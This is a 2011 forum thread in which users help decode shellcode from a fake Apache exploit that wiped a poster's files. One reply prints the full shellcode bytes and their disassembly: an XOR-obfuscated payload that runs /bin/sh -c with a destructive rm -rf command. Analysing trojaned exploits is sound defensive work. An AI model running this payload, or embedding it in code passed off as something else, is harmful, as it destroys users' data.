knives (Posted October 20, 2011)

Hello guys,

Is there an easier way to reverse engineer a shellcode to know what payload it ran? Is there software to convert a shellcode to a much more readable output? I've seen and tried software that converts shellcodes to assembly language only. Is there a better one? As there are lots of fraud hacks/exploits posted around, like this one ----> http://pastebin.com/f5571e439 . Might be helpful for everyone as well.

Thanks in advance.
Mr-Protocol (Posted October 20, 2011, edited October 20, 2011 by Mr-Protocol)

That example shellcode is in C. Most shellcode will typically be in C.

I'm not sure what you mean by a "more readable output"... Also not sure what you mean by "fraud hacks/exploits".
Hyperant (Posted October 20, 2011)

What do you mean, most shellcode will typically be in C? I think you should read up on how to write shellcode.

http://www.vividmachines.com/shellcode/shellcode.html
http://projectshellcode.com/?q=node/12
http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
hexophrenic (Posted October 20, 2011)

I suspect he means that most shellcode is contained within C code for delivery.
knives, author (Posted October 20, 2011)

The link that I mentioned says Apache exploit, but if you run that exploit, it will delete your root directory. (I ran it on my BT5 VM.) That's why I said fraud exploit/hack. And I want to know what else it did on my system; that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.
hexophrenic (Posted October 20, 2011)

Just a quick hint: if you can, since you are in a VM environment anyhow, take a snapshot before doing risky things (dist-upgrade, running exploits you don't trust, etc.). Sorry I cannot help further on decoding shellcode.
int0x80 (Posted October 24, 2011)

This is not smc so it is pretty easy:

    $ echo -en "\xb8\xff\x2f\x73\x68\xc1\xe8\x08\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\x50\x66\xb8\x71\x71\x66\x35\x51\x51\x66\x50\xb8\x23\x37\x71\x2f\x35\x51\x51\x51\x51\x50\xb8\x23\x3c\x71\x7c\x35\x51\x51\x51\x51\x50\x89\xe1\x31\xc0\x50\x66\xb8\x2d\x63\x66\x50\x89\xe2\x31\xc0\xb0\x64\x29\xc4\x31\xc0\x50\x51\x52\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd\x80\xb4\x01\x31\xdb\xcd\x80" | ndisasm -u -
    00000000  B8FF2F7368        mov eax,0x68732fff
    00000005  C1E808            shr eax,0x8
    00000008  50                push eax
    00000009  B82F62696E        mov eax,0x6e69622f
    0000000E  50                push eax
    0000000F  89E3              mov ebx,esp
    00000011  31C0              xor eax,eax
    00000013  50                push eax
    00000014  66B87171          mov ax,0x7171
    00000018  66355151          xor ax,0x5151
    0000001C  6650              push ax
    0000001E  B82337712F        mov eax,0x2f713723
    00000023  3551515151        xor eax,0x51515151
    00000028  50                push eax
    00000029  B8233C717C        mov eax,0x7c713c23
    0000002E  3551515151        xor eax,0x51515151
    00000033  50                push eax
    00000034  89E1              mov ecx,esp
    00000036  31C0              xor eax,eax
    00000038  50                push eax
    00000039  66B82D63          mov ax,0x632d
    0000003D  6650              push ax
    0000003F  89E2              mov edx,esp
    00000041  31C0              xor eax,eax
    00000043  B064              mov al,0x64
    00000045  29C4              sub esp,eax
    00000047  31C0              xor eax,eax
    00000049  50                push eax
    0000004A  51                push ecx
    0000004B  52                push edx
    0000004C  53                push ebx
    0000004D  89E1              mov ecx,esp
    0000004F  31D2              xor edx,edx
    00000051  31C0              xor eax,eax
    00000053  B00B              mov al,0xb
    00000055  CD80              int 0x80
    00000057  B401              mov ah,0x1
    00000059  31DB              xor ebx,ebx
    0000005B  CD80              int 0x80

Let me know if you need more help.
Mr-Protocol (Posted October 25, 2011)

> What do you mean, most shellcode will typically be in C? I think you should read up on how to write shellcode.
> http://www.vividmachines.com/shellcode/shellcode.html
> http://projectshellcode.com/?q=node/12
> http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html

I know about shellcode, I have been through Offensive Security material. Thanks though.

> I suspect he means that most shellcode is contained within C code for delivery.

Yes.

> The link that I mentioned says Apache exploit, but if you run that exploit, it will delete your root directory. (I ran it on my BT5 VM.) That's why I said fraud exploit/hack. And I want to know what else it did on my system; that's why I want to know if there's a way to convert it to more easily traceable code other than assembly code.

Sometimes that is done intentionally to stop noobs from just copy/pasting exploits. You have to modify the code to make things work anyway.